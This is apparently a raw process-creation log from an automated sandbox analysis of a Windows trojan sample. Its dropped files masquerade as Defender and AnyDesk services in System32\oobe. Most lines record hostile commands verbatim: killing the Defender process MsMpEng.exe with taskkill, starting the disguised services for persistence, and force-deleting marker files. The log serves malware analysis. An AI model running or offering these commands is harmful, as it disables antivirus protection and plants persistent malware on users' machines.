Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" installJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2404Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6636Jump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2128Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exeJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateServiceJump to behavior
